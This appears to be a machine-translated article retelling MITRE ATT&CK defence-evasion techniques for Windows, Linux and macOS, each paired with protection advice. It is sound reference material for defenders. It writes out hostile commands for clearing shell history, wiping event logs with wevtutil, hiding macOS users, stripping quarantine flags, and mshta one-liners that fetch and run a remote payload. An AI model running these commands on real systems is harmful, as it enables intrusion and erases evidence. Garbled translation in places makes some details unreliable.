We study Adversarial Tactics, Techniques & Common Knowledge (ATT @ CK). Enterprise Tactics. Part 5

    Defense Evasion

    Links to all parts:
    Part 1. Obtaining initial access (Initial Access)
    Part 2. Execution (Execution)
    Part 3. Consolidation (Persistence)
    Part 4. Privilege Escalation
    Part 5. Defense Evasion
    Part 6. Obtaining credentials (Credential Access)
    Part 7. Discovery (Discovery)
    Part 8. Lateral Movement

    The “Protection Bypass” section describes techniques by which an attacker can hide malicious activity and prevent its detection by means of protection. Different variations of techniques from other sections of the attack chain that help overcome specific defenses and preventive measures taken by the defending party are included in the protection bypass techniques. In turn, protection bypass techniques are used in all phases of an attack.

    The author is not responsible for the possible consequences of the application of the information contained in the article, and also apologizes for any inaccuracies in some formulations and terms. The published information is a free recount of MITER ATT & CK content .

    Handling access tokens (Access Token Manipulation)

    System: Windows
    Permissions: User, Administrator
    Description:Attackers can use access tokens (Access Token) to perform their actions in various user or system security contexts, thus avoiding the detection of malicious activity. An adversary can use the Windows API functions to copy access tokens from existing processes (Token stealing), for this it must be in the context of a privileged user (for example, an administrator). Theft of access tokens is typically used to elevate privileges from administrator level to System level. An adversary can also use the account access token to authenticate the remote system if the account has the necessary permissions on the remote system. There are three main ways to abuse access tokens.

    Theft and impersonation of tokens.
    The impersonation of tokens is the ability of the OS to start threads in a security context other than the context of the process to which this thread belongs. In other words, impersonating tokens allows you to perform any actions on behalf of another user. An adversary can create a duplicate access token using the DuplicateTokenEX function and use ImpersonateLoggedOnUser to call the stream in the context of the logged in user, or use SetThreadToken to assign an access token to the stream.

    Creating a process using an access token.
    An attacker can create an access token using the DuplicateTokenEX function and then use it withCreateProcessWithTokenW to create a new process that runs in the context of the impersonated user.

    Obtaining and impersonating access tokens.
    An adversary, having a username and password, can create a login session using the LogonUser API function , which will return a copy of the session access token of a new session, and then, using the SetThreadToken function , assign the resulting token to the stream.
    Metasploit Meterpreter and CobaltStrike have tools for manipulating access tokens to increase privileges.

    Protection recommendations:In order to fully use the tactics described above, an attacker must have system administrator rights, so do not forget to limit the privileges of ordinary users. Any user can trick access tokens if they have valid credentials. Restrict the ability of users and groups to create access tokens:

    GPO: Computer Configuration> [Policies]> Windows Settings> Security Settings> Local Policies> User Rights Assignment: Create a token object .

    Also determine who can replace local or network service process tokens:
    GPO: Computer Configuration> [Policies]> Windows Settings> Security Settings> Local Policies> User Policies> Replace a process level token.

    Creating BITS Jobs (BITS Jobs)

    System: Windows
    Permissions: User, Administrator, System
    Description:Windows Background Intelligent Transfer Service (BITS) is an asynchronous file transfer mechanism through the Component Object Model (COM) using low bandwidth. BITS is usually used by update programs, instant messengers and other applications that prefer to run in the background without interrupting the operation of other network applications. File transfer tasks are represented as BITS jobs that contain a queue of one or more file operations. The interface for creating and managing BITS tasks is available in the PowerShell and BITSAdmin tool. Attackers can use BITS to download, run, and clean up after running the malicious code. BITS tasks are stored autonomously in the BITS database, and no new files or registry entries are created in the system, BITS is often allowed by the firewall.

    Protection recommendations: BITS is a standard OS functionality, the use of which is difficult to distinguish from malicious activity, therefore, the protection vector should be aimed at preventing the attacker's tools from running at the beginning of the attack chain. Disabling BITS completely can lead to the termination of updating legitimate software, but you can consider limiting access to the BITS interface for specific users and access groups, you can also limit the lifetime of BITS tasks, which is set by changing the following keys:

    • HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ BITS \ JobInactivityTimeout;
    • HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ BITS \ MaxDownloadTime .

    Binary padding data (Binary Padding)

    System: Windows, Linux, macOS
    Description: Some security tools scan files by searching for static signatures. Opponents can add data to malicious files in order to increase their volume to a value exceeding the maximum allowed size of the scanned file or to modify the hash of the file in order to bypass the black lists of blocking the launch of files by hashes.

    Protection recommendations: Provide identification of potentially dangerous software by using tools such as AppLocker , whitelisting tools and software restriction policies.

    Bypass User Account Control

    System: Windows
    Permissions: User, Administrator
    Description: There are many ways to circumvent UAC, the most common of which are implemented in the UACMe project . New ways of circumventing UAC are regularly detected, similar to the abuse of the eventvwr.exe system application , which can execute a binary file or script with elevated privileges. Malicious programs can also be embedded in trusted processes, with which UAC allows privilege escalation without prompting the user.

    To bypass UAC using the eventvwr.exe in the Windows registry, the key is modified:
    [HKEY_CURRENT_USER] \ Software \ Classes \ mscfile \ shell \ open \ command .

    To bypass UAC using sdclt.exe in the Windows registry, the keys are modified:
    [HKEY_CURRENT_USER] \ Software \ Microsoft \ Windows \ CurrentVersion \ App Paths \ control.exe;
    [HKEY_CURRENT_USER] \ Software \ Classes \ exefile \ shell \ runas \ command \ isolatedCommand.

    Security Tips : Remove users from the local Administrators group on the protected systems. If possible, enable the highest level of protection in the UAC settings.

    CMSTP (AppLocker ByPass - CMSTP)

    System: Windows
    Permissions: User
    Description: The Microsoft Connection Manager Profile Installer (cmstp.exe) is the “Connection Manager Profile Installer” built into Windows. Cmstp.exe can take an inf-file as a parameter, so an attacker can prepare a special malicious INF for loading and executing DLLs or scriptlets (* .sct) from remote servers, bypassing AppLocker and other locks, because cmstp.exe is signed with a Microsoft digital certificate.

    Protection recommendations: Blocking the launch of potentially dangerous applications. Monitor or completely block launches C: \ Windows \ System32 \ cmstp.exe .

    Clear Command History (Clear Command History)

    System: Linux, macOS
    Permissions: User
    Description: For the convenience of users, all commands executed by the user in the terminal are logged in macOS and Linux. Users can quickly execute the command they performed earlier in another session. When a user logs in, the command history is saved to the file that is specified in the HISTFILE variable. When a user logs out, the command history is saved to the user's home directory ~ / .bash_history. A file with a history of commands may also contain passwords entered by the user in clear text. Attackers can either search for passwords in command history files or use measures to prevent their malicious activity from being recorded in the command history, for example:

    unset HISTFILE;
    export HISTFILESIZE = 0;
    history -c;
    rm ~ / .bash_history.
    Security Tips

    : Preventing users from deleting or writing bash_history files can prevent an adversary from misusing these files, and restricting user rights to editing the HISTFILE and HISTFILESIZE variables will ensure that the command execution log is saved.

    Code Signing

    System: Windows, macOS
    Description: The digital signature of the code provides developer authentication and ensures that the file has not been changed. However, as you know, opponents can use signatures to disguise malware as legitimate binaries. Certificates for digital signatures can be created, tampered with or stolen by an attacker. Signing the code to check the software for the first time is used in Windows, macOS, OS X and is not used in Linux due to the decentralized structure of the platform. Code signing certificates can be used to bypass security policies that require that only signed code be executed on the system.

    Protection recommendations: Using whitelists of software and choosing reliable software publishers before verifying a digital signature can prevent malicious code from running in unprotected code in the protected system.

    Component Firmware

    System: Windows
    Rights: System
    Description: Some attackers can use sophisticated tools to compromise computer components and install malicious firmware on them, which will run malicious code outside the operating system or even the main system firmware (Bios). The technique is the firmware of computer components that do not have a built-in system for checking the integrity of, for example, hard drives. A device with malicious firmware can provide constant access to the attacked system despite failures and overwriting of the hard disk. The technique is designed to overcome software protection and integrity control.

    Interception of links and communications COM (Component Object Model Hijacking)

    System: Windows
    Permissions: User
    Description: Microsoft Component Object Model (COM) is a technology for creating software based on interacting components of an object, each of which can be used in many programs at the same time. Attackers can use COM to insert malicious code that can be executed instead of legitimate via the capture of COM links and connections. To intercept a COM object, you need to replace the reference to a legitimate system component in the Windows registry. If you further call this component, the malicious code will be executed.

    Protection recommendations:Preventive measures to prevent this attack are not recommended because COM objects are part of the OS and software installed on the system. Locking changes to COM objects can affect the stability of the operating system and software. The protection vector is recommended to be directed to blocking malicious and potentially dangerous software.

    Control Panel Items (Windows Control Panel Items)

    System: Windows
    Permissions: User, Administrator, System
    Description: The tactic is to allow the attackers to use Windows Control Panel elements to execute arbitrary commands (for example, the Reaver virus ) as a payload . Malicious objects can be disguised as standard controls and delivered to the system using phishing attachments. Utilities for viewing and configuring Windows settings are registered exe-files and CPL-files of Windows control panel elements. CPL files are actually renamed DLLs that can be run in the following ways:

    • directly from the command line: control.exe <file.cpl> ;
    • using API functions from shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
    • double click on the cpl file.

    Registered CPLs stored in System32 are automatically displayed in the Windows Control Panel and have a unique identifier stored in the registry:

    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

    Information about other CPLs , such as the display name and cpl path -files are stored in the “Cpls” and “Extended Properties” sections of the section:

    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panel

    Some CPLs launched through the command shell are registered in the section:

    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

    Protection Recommendation:Restriction of launching and storing control panel files in protected folders only (for example, C: \ Windows \ System32 ), including User Account Control (UAC) and AppLocker to prevent unauthorized changes to the system. Of course, the use of anti-virus software.


    System: Windows
    Permissions: Administrator
    Description: DCShadow assumes the creation of a fake domain controller in the attacked network with which an attacker can change the AD data, including changes to any domain object, credentials and keys unnoticed by the SIEM, to interact with the attacked CD. -systems The toolkit for implementing the attack is part of mimikatz. DCShadow can be used to execute an SID-History injection attack and to create backdoors for the purpose of further consolidation in the system.

    Protection recommendations:Considering that the DCShadow technique is based on the abuse of AD design features, the protection vector should be aimed at preventing the launch of attack implementation tools. You can detect an attack by analyzing the network traffic of CD replication, which runs every 15 minutes, but can be triggered by an off-schedule attacker.

    Interception Search DLL (DLL Search Order Hijacking)

    System: Windows
    Rights: User, Administrator, System
    Description: The technique is to exploit the vulnerabilities of the application's search algorithm for the DLL files they need to work ( MSA2269637 ). Often, the DLL search directory is the working directory of the program, so attackers can replace the original DLL with a malicious one with the same file name.

    Remote attacks on DLL search can be carried out when the program installs its current directory in a remote directory, for example, a network share. Also, attackers can directly change the way the DLL is searched and loaded by replacing the .manifest or .local files that describe the DLL search parameters. If the attacked program works with high privileges, then the malicious DLL loaded by it will also be executed with high rights. In this case, the technique can be used to elevate privileges from the user to the administrator or System.

    Advice on protection: The ban DLL remote boot (enabled by default in Windows Server 2012+ and is available with upgrades to XP +, and Server 2003+). Enable safe search mode DLL, which will limit the search directories directories of type% SYSTEMROOT% before performing a DLL search in the current application directory.

    Enable DLL Safe Search:
    Computer Configuration> [Policies]> Administrative Templates> MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.
    The corresponding registry key is
    HKLM \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SafeDLLSearchMode.

    Consider the feasibility of auditing the protected system to eliminate DLL weaknesses using tools such as the PowerUP module in PowerSploit. Do not forget about blocking malicious and potentially dangerous software, as well as the implementation of Microsoft recommendations .

    Side loading DLL (Side-Loading DLL)

    System: Windows
    Description: The attack is based on the vulnerabilities of the side-by-side parallel execution technology (WinSxS or SxS), the essence of which lies in providing the ability to run applications using incompatible versions of the same code components. The component assembly repository is located in the c: \ windows \ winsxs folder. Each assembly must have a manifest associated with it — an xml file containing information about files, classes, interfaces, libraries, and other elements of the assembly. Like the DLL search capture techniques, opponents can trigger a user application to “side-load” a malicious DLL, the path to which was specified in the assembly manifest file.

    % TEMP% \ RarSFX% \% ALLUSERS PROFILE% \ WinSxS.

    Security recommendations: Regular software updates, installation of applications in write-protected directories. Use the sxstrace.exe program to check manifest files for side loading vulnerabilities.

    Deobfuscation / decryption of files or information (Deobfuscate / Decode Files or Information)

    System: Windows
    Rights: User
    Description: Attackers can use obfuscation of files and information to hide malicious code and artifacts remaining from the invasion. To use such files, opponents use reverse techniques to deobfuscate / decode files or information. Such methods may involve the use of malicious software, various scripts or system utilities, for example, there is a known method of using the certutil utility to decode an executable file of a remote access tool hidden inside a certificate file. Another example is using the copu / b command to collect binary fragments into a malicious payload (Payload).

    Payload files can be compressed, archived or encrypted to avoid detection. Sometimes, to perform deobfuscation or decryption, user action (User execution) may be required. The user may need to enter a password to open a compressed or encrypted file or script with malicious content. Security Tips

    : Identifying and blocking unnecessary system utilities or potentially dangerous software that can be used to deobfuscate or decrypt files using tools such as AppLocker and software restriction policies.

    Disabling Security Tools

    System: Windows, Linux, macOS
    Description: Attackers can disable various security tools, destroy event logging processes, registry keys, prevent security tools from starting during malicious activity, or use other methods to interfere with security scanners or event reports.

    Security Tips : Ensure that permissions for processes, registry, and files are properly configured to prevent unauthorized disabling or tampering with security features.

    Exploitation for Defense Evasion Exploitation

    System: Windows, Linux, macOS
    Permissions: User
    Description: As in any software, security software may have vulnerabilities that could be used by an attacker to disable or circumvent them.

    Protection recommendations: Regular software updates, development and implementation of a software vulnerability management process. The use of virtualization and micro-segmentation of applications can reduce the risks of possible exploitation of vulnerabilities.

    EWM injection (Extra Window Memory Injection)

    System: Windows
    Permissions: Administrator, System
    Description: The technique is the abuse of additional Windows memory, the so-called Extra Window Memory (EWM). The EWM size is 40 bytes, it is suitable for storing a 32-bit pointer, and is often used to refer to procedures. Malicious programs during the attack chain can place a pointer to malicious code in EWM, which will then be launched by the process of an infected application.

    Protection recommendations:Considering that EWM injection techniques are based on the abuse of OS development features, protection efforts should be directed at preventing the launch of malicious programs and malicious tools. It is good practice to identify and block potentially dangerous software using AppLocker, organizing an application whitelist, or applying Software Restriction Policies software restriction policies.

    File Deletion

    System: Windows, Linux, macOS
    Permissions: User
    Description: Various tools, malware and other files used by the adversary may leave traces of hacking activity in the system. Attackers can delete these artifact files during an invasion to reduce the likelihood of an attack being detected or delete them at the end of their operation. The adversary can use both special tools for guaranteed information destruction (for example, Windows Sysinternals Sdelete), as well as tools built into the OS, for example, DEL and Сipher.

    Protection recommendations: If possible, block the launch of unnecessary system utilities, third-party tools and potentially dangerous software that can be used to destroy files.

    Reading Files with File System Logical Offsets

    System: Windows
    Permissions: Administrator
    Description: Windows can allow programs to directly access logical volumes. Programs with direct access can read and write files directly to the hard disk, analyzing the data structure of the file system. This method bypasses file access control and file system monitoring. Utilities such as NinjaCopy are used to perform the above actions in PowerShell.

    Protection recommendations: Blocking potentially dangerous software.

    Gatekeeper Bypass Bypass

    System: macOS
    Permissions: User, Administrator
    Description:In macOS and OS X, Gatekeper technology is used, which ensures that only trusted software is launched. When downloading an application from the Internet, a special attribute is set in the com.apple.quarantine file, which indicates that the Gatekeeper should ask the user for permission to execute the downloaded file. The flag is set before saving the file to disk, then when the user tries to open the file, the Gatekeeper checks for the presence of the corresponding flag and, if there is one, the system will prompt the user to confirm the launch and show the URL from which the file was downloaded. Applications downloaded to the system from a USB drive, optical, child or network drive will not cause the flag setting in the com.apple.quarantine file. Some utilities and files that got into the system under attack during shadow boot (Drive-by-compromise technique), also do not cause the flag to be set for the gatekeeper, thus bypassing the verification of the power of attorney The presence of the quarantine flag can be checked with the command:xattr /path/to/MyApp.app .

    You can also remove the flag using attr, but this will require elevation of privileges:
    sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app

    Protection recommendations: In addition to the Gatekeeper, you should use a ban on launching applications that are not loaded from Apple Store.

    HISTCONTROL variable

    System: Linux, macOS Privileges
    : User
    Description: The HISTCONTROL environment variable represents the list of parameters for saving the command history to the ~ / .bash_history file when a user logs off. For example, the ignorespace option indicates that you do not need to save lines starting with a space, and the ignoredups option will disable saving repeated commands in a row. On some Linux systems, the default option is ignoreboth, which includes the above two options. This means that the "ls" command will not be saved in history, unlike "ls".

    HISTCONTROL is not used by default in macOS, but can be customized by the user. Attackers can use the features of the HISTCONTROL parameters in order not to leave traces of their activities simply by inserting spaces in front of the commands. Security Tips

    : Prevent users from changing the HISTCONTROL variable, besides make sure that HISTCONTROL is set to ignoredup and does not contain the ignoreboth and ignorespace options.

    Hidden files and folders (Hidden Files and Directories)

    System: Windows, Linux, macOS
    Permissions: User
    Description: On Windows, users can hide files using the attrib command. It is enough to specify the attribute + h <file name> to hide the file or "+ s" to mark the file as system. By adding the "/ S" parameter, the attrib utility will apply the changes recursively. In Linux / Mac, users can hide files and folders simply by typing a "." At the beginning of the file name. After this, the files and folders will be hidden from the Finder application and such as the ls utility.

    In macOS, files can be marked with the UF_HIDDEN flag, which will turn off the ban on their visibility in Finder.app, but will not prevent you from seeing hidden files in Terminal.app. Many applications create hidden files and folders so as not to clutter up the user's workspace. For example, SSH utilities create a hidden .ssh folder that stores a list of known hosts and user keys.

    Attackers can use the ability to hide files and folders, so as not to attract the attention of users.

    Protection recommendations: Preventing the use of this technique is difficult due to the fact that hiding files is a regular feature of the OS.

    Hidden users

    System: macOS
    Permissions: Administrator, root
    Description: Each account in macOS has a userID that can be specified during the creation of the user. In the /Library/Preferences/com.apple.loginwindow properties there is a Hide500Users option that hides users with identifiers 500 and lower from the login screen. Thus, by creating a user with the identifier <500 and enabling Hide500Users, an attacker can hide his accounts:

    sudo dscl. -create / User / username UniqueID 401
    sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUE

    Protection recommendations:If the workstation is in a domain, then Group Policy can limit the ability to create and hide users. Similarly, the ability to modify the properties of /Library/Preferences/com.apple.loginwindow is prevented.

    Hidden windows

    System: macOS
    Permissions: User
    Description: Application launch options on macOS and OS X are listed in the plist properties files. One of the tags in these apple.awt.UIElement files includes hiding the Java application icon from the Dock. Typically, this tag is used for applications running in the system tray, but attackers can abuse this feature and hide malicious applications. Security Tips

    : Control the list of programs that have the apple.awt.UIElement tag in the plist properties.

    IFEO injection (Image File Execution Options Injection)

    System: Windows
    Permissions: Administrator, System
    Description: The Image File Execution Options (IFEO) mechanism allows you to run instead of the program its debugger, previously specified by the developer in the registry:

    • HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options / [executable]
    • HKLM \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ [executable] , where [executable] is the binary executable of the debugger.

    Like injections, the value of [executable] can be abused by running arbitrary code to elevate privileges or gain a foothold in the system. Malicious programs can use IFEO to bypass protection by registering debuggers that redirect and reject various system and security applications.

    Protection Recommendations: The described technique is based on the abuse of standard OS development tools, so any restrictions may cause instability in the operation of legitimate software, for example, security applications. Efforts to prevent the use of IFEO injections need to be focused on the earlier stages of the attack chain. You can detect such an attack by monitoring processes with the Debug_process flags andDebug_only_this_process .

    Indicator Blocking

    System: Windows
    Description: Attackers may attempt to block various indicators or events captured by security tools for further analysis. Malicious activity may include modifying security configuration files, registry keys, or malicious telemetry event forwarding.

    In dealing with network activity analysis tools, an attacker could block the traffic associated with sending reports to the security management server. This can be done in many ways, for example, by stopping the local process responsible for transmitting telemetry, creating a rule in the firewall to block traffic to the hosts responsible for the aggregation of security events.

    Protection recommendations:Make sure that the tracers and event senders, firewall policies, and other related mechanisms are protected by appropriate permissions and access controls. Consider the ability to automatically restart security event forwarding at repeated intervals, as well as the ability to apply appropriate change management to firewall rules and other system configurations.

    Removing indicators from malicious tools (Indicator Removal from Tools)

    System: Windows, Linux, macOS
    Description:If a malicious application is quarantined or otherwise blocked, then an attacker can determine the reason for detecting his tool (indicator), change the tool, remove the indicator from it, and use an updated version of the malware that will not be detected by protective tools. A good example is detecting malware using checksums or file signatures and quarantining antivirus software. An attacker who detects that the malware was quarantined by antivirus software because of his signature / checksum, can use software packaging techniques or other ways to modify the file to change the signature or checksum, and then reuse this malware.

    Protection recommendations:An adversary can have access to the system and know which methods and tools are blocked by resident protection. Use advanced methods to configure protection and security, investigate the process of possible compromise of the protected system in order to organize the process of notification of a possible invasion.

    Detect and block potentially dangerous and malicious software using the tools for organizing white lists of applications, such as AppLocker and software restriction policies.

    The first detection of a malicious tool may alert the anti-virus system or other security tool. Such events can occur at the perimeter border and be detected using an IDS system, mail scanning, etc. Initial detection should be considered as a sign of the start of the invasion, which requires careful research outside the “location” of the initial event. Attackers can continue the attack, assuming that individual events of the antivirus software will not be investigated or that the analyst will not be able to finally link the registered event with other activity occurring on the network.

    Removing indicators from the host (Indicator Removal on Host)

    System: Windows, Linux, macOS
    Description: Attackers can delete or modify artifacts generated on the attacked system, including logs and intercepted files quarantined. The location and format of the logs may vary depending on the OS, system logs are recorded as Windows Event or Linux / macOS files, such as /.bash_history and .var / log / *.

    Targeted actions that interfere with event collection and alert mechanisms that could be used to detect an intrusion may compromise security tools, with the result that security events will not be analyzed. Such actions may complicate the examination and the response process due to the lack of data on the invasion that occurred.

    Clearing Windows Event Logs Logs
    Windows Event Logs is a recording of alerts and notifications and system operation. Microsoft defines an event as "any significant event in the system or program that requires user notification or logging." There are three system event sources: system, applications, and security.
    Opponents who perform actions related to managing accounts, logging into the account, access to directory services, etc. can clear the event log to hide their actions.
    Event logs can be cleared with the following console utilities:
    wevtutil cl system;
    wevtutil cl application;
    wevtutil cl security.

    Logs can also be cleared by other means, such as PowerShell.

    Security Tips : Use centralized event log storage to make it impossible for your local machine to view and manage event logs. If possible, minimize time delays when reporting events to avoid long-term storage of logs on the local system. Protect event log files stored locally with proper permissions and authentication, and limit the ability of adversaries to elevate privileges. Use tools to obfuscate and encrypt log files during storage locally and during transfer. Monitor logs for event 1102: "The audit log has been deleted."

    Indirect Command Execution

    System: Windows
    Permissions: User
    Description: Various Windows utilities can be used to execute commands, possibly without calling cmd. For example, Forfiles, Program Compatibility Assistant (pcalua.exe), components of the Windows subsystem for Linux (WSL), as well as other utilities can trigger the execution of programs and commands from the command line interface, the Run window, or through scripts.

    Attackers can abuse the above utilities in order to bypass security tools, in particular, to randomly launch files until their activity is detected or blocked by various means, for example, using group policies that prohibit the use of CMDs.

    Protection recommendations:Identify and block potentially dangerous and malicious software with AppLocker and software restriction policies. These mechanisms can be used to disable or restrict user access to utilities that can be used for indirect command execution.

    Install Root Certificate

    System: Windows, Linux, macOS
    Permissions: Administrator, user
    Description: Root certificates are used to identify a certification authority (CA). When the root certificate is installed, the system and applications will trust all the certificates in the root certificate chain. Certificates are typically used to establish secure TLS / SSL connections in a web browser. If a user tries to open a site on which an untrusted certificate is presented, an error message will appear that warns the user about a security risk. Depending on the security settings, the browser may prohibit connections to untrusted sites.

    Installing a root certificate in the attacked system allows an attacker to reduce the overall level of system security. Attackers can use this method to hide security alerts, causing the user to connect via HTTPS to adversary-controlled web servers to steal their credentials.
    Third-party root certificates can also be pre-installed by the software manufacturer or through the software supply chain and used in conjunction with malware and adware, or to enable a man-in-the-middle attack to intercept information transmitted over TLS / SSL secure connections.
    Root certificates can also be cloned and reinstalled. such certificate chains can be used to sign malicious code in order to bypass the signature verification tools used to block and detect intruders.

    In macOS, malware Ay MaMi uses the command / usr / bin / security add-trusted-cert -d -r trustRoot -k / Library / Keychains / System / keychain path / to / malicious / cert to install the certificate as a reliable root certificate in system chain.

    Protection recommendations:HTTP Public Key Pinning (HPKP) is one way to protect against attacks on a chain of certificates. HPKP assumes that the server informs the client a set of public key hashes that should be the only trusted when connecting to this server for a specified time.

    Windows Group Policy can be used to manage root certificates and enable non-administrators to add additional root certificates to the user’s storages (HKCU):

    HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ SystemCertificates \ Root \ ProtectedRoots \ Flags = 1.

    Root certificates of the system are unlikely to change often, so during the monitoring of new certificates you can identify malicious activity or make sure that there are no unnecessary or suspicious certificates. Microsoft provides a list of trusted root certificates via authroot.stl. Sigcheck can be used to reset the contents of the certificate store (Sigcheck [64] .exe -tuv) and to identify certificates not included in the Microsoft Certificate Trust List.

    Installed root certificates are in the registry in the following sections:

    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ EnterpriseCertificates \ Root \ Certificates
    HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \ SOFTWARE [\ Policies] \ Microsoft \ SystemCertificates \ Root \ Certificates

    There is a subset of root certificates that are constantly used in Windows systems that can be used for monitoring:

    • 18F7C1FCC3090203FD5BAA2F861A754976C8DD25;
    • 245C97DF7514E7CF2DF8BE72AE957B9E04741E85;
    • 3B1EFD3A66EA28B16697394703A72CA340A05BD5;
    • 7F88CD7223F3C813818C994614A89C99FA3B5247;
    • 8F43288AD272F3103B6FB1428485EA3014C0BCFE;
    • A43489159A520F0D93D032CCAF37E7FE20A8B419;
    • BE36A4562FB2EE05DBB3D32323ADF445084ED656;
    • CDD4EEAE6000AC7F40C3802C171E30148030C072.


    System: Windows
    Permissions: User
    Description: InstallUtil is a Windows command line utility that can install and uninstall applications that comply with the .NET Framework specifications. Installutil is automatically installed with VisualStudio. The InstallUtil.exe file is signed with a Microsoft certificate and is stored in:

    C: \ Windows \ Microsoft .NET \ Framework \ v [version] \ InstallUtil.exe

    Attackers can use the InstallUtil functionality to proxy code execution and bypass white-letter applications. Security Tips

    : Your InstallUtil may not be used on your system, so consider blocking the launch of InstallUtil.exe.

    LC_MAIN Hijacking

    System: macOS
    Rights: User, Administrator
    Description: Starting with OS X 10.8, the LC_MAIN header is included in the mach-O executable files, which indicates the binary code entry point for its execution. In earlier versions, two LC_THREAD and LC_UNIXTHREAD headers were used. The entry point for the binary can be modified and a malicious addition will be performed initially, and then the execution will return to the starting point so that the victim will not notice anything. Such modification of binary files is a way to bypass the white list of applications, because the file name and the path to the application will remain unchanged.

    Protection recommendations:Use applications that have only valid digital signatures of trusted developers. Modifying the LC_MAIN header will invalidate the file signature and change the checksum of the file.


    System: macOS
    Permissions: User, Administrator
    Description: Launchctl is a utility for managing Launchd service. With Launchctl, you can manage system and user services (LaunchDeamons and LaunchAgents), as well as execute commands and programs. Launchctl supports command line subcommands interactive or redirected from standard input:

    launchctl submit -l [labelname] - / Path / to / thing / to / execute '' arg "'' arg" '' arg " .

    Starting and restarting services and Malefactors can execute code and even bypass the whitelist if the launchctl is an authorized process, but loading, unloading and reloading services and daemons may require elevated privileges.

    Restricting user rights to create Launch Agents and launch Launch Deamons through group policy. Using the KnockKnock app, you can discover programs that use launchctl to manage Launch Agents and Launch Deamons.


    System: Windows, Linux, macOS
    Description: Masquerading occurs when the name or location of an executable file, legal or malicious, undergoes various manipulations and abuses in order to circumvent protection. There are several options for masquerading.
    One option is to place the executable file in a common directory or get the name of a legitimate, trusted program. The file name may be similar to the name of a legitimate program. This method of masking is used to bypass tools that trust files, relying on the name or path to the file, as well as to deceive system administrators.

    Another option for maximization is that the attacker used an renamed modified copy of a legitimate utility, such as rundll32.exe. In this case, the legitimate utility can be moved to another directory and renamed to avoid detection based on monitoring the launch of system utilities from non-standard locations.
    An example of the abuse of trusted directories in Windows is the directory C: \ Windows \ System32. The names of trusted system utilities such as explorer.exe or svchost.exe can be assigned to malicious binaries.

    The next way to disguise is to use malicious binary files that, after starting, change the name of their process to the name of a legitimate, reliable process. An example of a trusted directory on Linux is the / bin directory, and trusted names can be names like rsyncd or dbus-inotifier. Security Tips

    : By creating different security rules, avoid exceptions based on the name and path to the file. Require binary signatures. Use file system access control to protect trusted directories such as C: \ Windows \ System32. Do not use tools to restrict the execution of programs based on the name or path to the file.

    Identify and block potentially dangerous and malicious software that may look like a legitimate program.

    Modify Registry

    System: Windows
    Rights: User, administrator, system
    Description: Attackers can modify the registry to hide information in registry keys or delete information during the stripping process of intrusion traces or at other stages of an attack.

    Access to specific areas of the registry depends on account permissions. Built-in utility Reg can be used both for local and for remote modification of the registry. Other remote access tools that interact with the registry through the Windows API can also be used.

    Registry changes may include hiding keys, for example, by adding keys with the name of a null character. Reading such a key through Reg or API will end in error or will be lost. Attackers can use such hidden pseudo-keys to hide the utility load and the commands used during pinning in the system.

    The registry of a remote system can also be changed if the Remote Regisry service is active on the target system. Typically, an attacker also needs valid credentials, as well as access to Windows Admin Shares to use RPC.

    Protection recommendations: Incorrect setting of permissions in the registry can lead to the fact that an attacker can execute arbitrary code (Service Registry Permissions Weakness ). Ensure that users cannot change system component keys. Block unnecessary system utilities and other software that can be used to modify the registry. Consider enabling registry auditing (Event ID4657), but keep in mind that registry changes made using tools such as RegHide will not be registered by the OS Event Collection Service.


    System: Windows
    Permissions: User
    Description: Mshta.exe (located in C: \ Windows \ System32 \ ) is a utility that executes Microsoft HTML applications (* .HTA). HTA applications are run using the same technologies that InternetExplorer uses, but outside of the browser. Due to the fact that Mshta processes files bypassing browser security settings, attackers can use mshta.exe to proxy malicious HTA files, Javascript or VBScript. A malicious file can be launched using the built-in script:

    mshta vbscript: Close (Execute ("GetObject (" "script: https [:] // webserver / payload [.] Sct" ")"))

    or directly at the URL:

    mshta http [:] // webserver / payload [.] hta

    Security Tips : The mshta.exe functionality is associated with older versions of IE that have reached the end of their life cycle. Block Mshta.exe if you are not using its functionality.

    NTFS file attributes (NTFS File Attributes)

    System: Windows
    Description: The NTFS partition contains the Master File Table (MFT), which stores data about the contents of the volume, the rows correspond to the files, and the columns to their attributes, including attributes such as Extended attributes (EA), are the string of size 64kb) and Alternate Streams (Alternate Data Streams (ADS) - arbitrary size metadata), which can be used to store any data. Attackers can store malicious data and binary files in extended attributes and file metadata. This technique allows to bypass some protection tools, such as scanning tools based on static indicators and some anti-virus tools.

    Protection recommendations:Blocking access to EA and ADS can be quite complex and impractical and, in addition, lead to unstable operation of standard OS functionality. Direct protection vector to prevent software from starting, which can be used to hide information in EA and ADS.

    Removing connections to network resources (Network Share Connection Removal)

    System: Windows
    Permissions: Administrator, user
    Description: Network folder connections and Windows Admin Share can be deleted if they are no longer required. Net is an example utility that can be used to delete network connections: net use \ system \ share / delete . Opponents can remove network connections that they do not need to clear traces of intrusion.

    Security Tips: Follow best practices for organizing Windows Admin Shares. Identify unnecessary system utilities and software that can be used to connect to shared network resources and consider auditing its use or blocking.

    Obfuscated Files or Information

    System: Windows, Linux, macOS
    Description: Attackers can use encryption, encryption, and various methods of obfuscating files and their contents in the system or during their transfer.
    Payloads can be archived or encrypted, sometimes for their deobfuscation and subsequent launch some user action is required, for example, to enter a password to open an archive prepared by an attacker.

    To hide plain text lines, parts of files can also be encoded. Payloads can be divided into separate "benign" files that, when assembled into a single unit, perform malicious functionality.

    Opponents can also confuse commands called from payloads directly or via the command line interface. Environment variables, aliases, and symbols specific to the semantics of the platform or language can be used to bypass signature-based and whitelisted malware detection.

